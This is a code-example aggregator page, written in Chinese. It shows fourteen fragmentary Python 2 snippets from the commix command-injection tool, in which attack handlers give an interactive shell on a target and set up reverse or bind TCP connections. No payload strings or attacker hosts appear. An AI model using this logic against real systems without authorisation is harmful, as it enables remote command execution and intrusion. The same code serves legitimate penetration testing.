本文整理汇总了Python中src.core.injections.controller.checks.check_reverse_tcp_options函数的典型用法代码示例。如果您正苦于以下问题:Python check_reverse_tcp_options函数的具体用法?Python check_reverse_tcp_options怎么用?Python check_reverse_tcp_options使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了check_reverse_tcp_options函数的14个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: reverse_tcp_config
def reverse_tcp_config(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again):
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for the reverse TCP connection.
reverse_tcp.configure_reverse_tcp(separator = "")
if settings.REVERSE_TCP == False:
if settings.BIND_TCP == True:
os_shell_option = "bind_tcp"
bind_tcp_config(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
return go_back, go_back_again
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
return go_back, go_back_again
# execute bind TCP shell
execute_shell(url, cmd, cve, check_header, filename, os_shell_option)
示例2: eb_injection_handler
#.........这里部分代码省略.........
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
warn_msg = "You are already into an 'os_shell' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif os_shell_option == "reverse_tcp":
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = eb_injector.injection_results(response, TAG, cmd)
if settings.VERBOSITY_LEVEL >= 1:
print ""
err_msg = "The reverse TCP connection has been failed!"
print settings.print_critical_msg(err_msg)
else:
pass
else:
# The main command injection exploitation.
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
if menu.options.ignore_session or\
session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
# Evaluate injection results.
示例3: tb_injection_handler
#.........这里部分代码省略.........
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
while True:
try:
# Tab compliter
readline.set_completer(menu.tab_completer)
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
from src.core.injections.results_based.techniques.classic import cb_injector
whitespace = settings.WHITESPACES[0]
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
# Exploirt injection result
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The reverse TCP connection has been failed!" + Style.RESET_ALL
else:
pass
else:
print ""
# The main command injection exploitation.
check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
# Exploirt injection result
tb_injector.export_injection_results(cmd, separator, output, check_how_long)
print ""
except KeyboardInterrupt:
raise
except SystemExit:
raise
elif gotshell in settings.CHOISE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例4: cb_injection_handler
#.........这里部分代码省略.........
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
while True:
try:
# Tab compliter
readline.set_completer(menu.tab_completer)
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
return False
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
pass
else:
# Command execution results.
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
if shell:
shell = "".join(str(p) for p in shell)
html_parser = HTMLParser.HTMLParser()
示例5: tb_injection_handler
#.........这里部分代码省略.........
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
from src.core.injections.results_based.techniques.classic import cb_injector
separator = checks.time_based_separators(separator, http_request_method)
whitespace = settings.WHITESPACES[0]
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
# Export injection result
if menu.options.verbose:
print ""
print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection has been failed!" + Style.RESET_ALL
else:
pass
else:
print ""
if menu.options.ignore_session or \
session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
# The main command injection exploitation.
check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response)
# Export injection result
tb_injector.export_injection_results(cmd, separator, output, check_how_long)
示例6: tfb_injection_handler
#.........这里部分代码省略.........
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
warn_msg = "You are already into an 'os_shell' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif os_shell_option == "reverse_tcp":
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
from src.core.injections.results_based.techniques.classic import cb_injector
separator = checks.time_based_separators(separator, http_request_method)
whitespace = settings.WHITESPACE[0]
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG, cmd)
if settings.VERBOSITY_LEVEL >= 1:
print ""
err_msg = "The reverse TCP connection has failed!"
print settings.print_critical_msg(err_msg)
else:
pass
else:
print ""
if menu.options.ignore_session or \
session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
# The main command injection exploitation.
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response)
# Export injection result
tfb_injector.export_injection_results(cmd, separator, output, check_how_long)
if not menu.options.ignore_session :
示例7: shell
elif os_shell_option == "quit":
# Delete previous shell (text) files (output)
delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
settings.REVERSE_TCP = False
go_back_again = True
break
# Command execution results.
response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
# Command execution results.
shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
if menu.options.verbose:
示例8: shellshock_handler
#.........这里部分代码省略.........
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
warn_msg = "You are already into an 'os_shell' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
if menu.options.verbose:
print ""
err_msg = "The reverse TCP connection to the target host has been failed!"
print settings.print_error_msg(err_msg)
else:
pass
else:
shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
if menu.options.verbose:
print "\n" + settings.print_payload(payload)
err_msg = "The '" + cmd + "' command, does not return any output."
print settings.print_error_msg(err_msg) + "\n"
except KeyboardInterrupt:
raise
示例9: input_cmd
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique):
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input("\n" + settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print ""
os._exit(0)
elif cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "os_shell":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
elif cmd.lower() == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
if menu.options.verbose:
print ""
print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_NO:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_QUIT:
print ""
os._exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n"
pass
示例10:
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
warn_msg = "You are already into an 'os_shell' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif os_shell_option == "reverse_tcp":
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
# Command execution results.
shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
if menu.options.verbose:
示例11: input_cmd
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique):
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
while True:
try:
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print ""
os._exit(0)
elif cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
elif cmd.lower() == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_NO:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_QUIT:
print ""
os._exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
示例12: fb_injection_handler
#.........这里部分代码省略.........
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
# if settings.VERBOSITY_LEVEL >= 1:
# print ""
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
return False
elif os_shell_option == "quit":
# Delete previous shell (text) files (output)
delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
warn_msg = "You are already into an 'os_shell' mode."
print settings.print_warning_msg(warn_msg)+ "\n"
elif os_shell_option == "reverse_tcp":
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for The reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
continue
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
break
# Command execution results.
response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
# Command execution results.
shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
if settings.VERBOSITY_LEVEL >= 1:
print ""
err_msg = "The reverse TCP connection has been failed!"
print settings.print_critical_msg(err_msg)
else:
pass
else:
response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
if menu.options.ignore_session or \
session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
# Command execution results.
shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
shell = "".join(str(p) for p in shell)
if not menu.options.ignore_session :
session_handler.store_cmd(url, cmd, shell, vuln_parameter)
else:
shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
if shell:
示例13: shellshock_handler
#.........这里部分代码省略.........
print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
file_access(url, cve, check_header, filename)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
sys.exit(0)
else:
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
print ""
gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
while True:
try:
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == False:
return False
elif os_shell_option == "quit":
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
shell = cmd_exec(url, cmd, cve, check_header, filename)
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
pass
else:
shell = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
except SystemExit:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
continue
break
else:
continue
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
示例14: tfb_injection_handler
#.........这里部分代码省略.........
)
if os_shell_option == False:
if no_result == True:
return False
else:
return True
elif os_shell_option == "quit":
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(
separator,
payload,
TAG,
cmd,
prefix,
suffix,
http_request_method,
url,
vuln_parameter,
OUTPUT_TEXTFILE,
alter_shell,
filename,
)
sys.exit(0)
elif os_shell_option == "back":
go_back = True
break
elif os_shell_option == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n"
elif os_shell_option == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
from src.core.injections.results_based.techniques.classic import (
cb_injector,
)
separator = checks.time_based_separators(
separator, http_request_method
)
whitespace = settings.WHITESPACES[0]
response = cb_injector.injection(
separator,
TAG,
cmd,
prefix,
suffix,
whitespace,
http_request_method,
url,
vuln_parameter,
alter_shell,
filename,
)
# Evaluate injection results.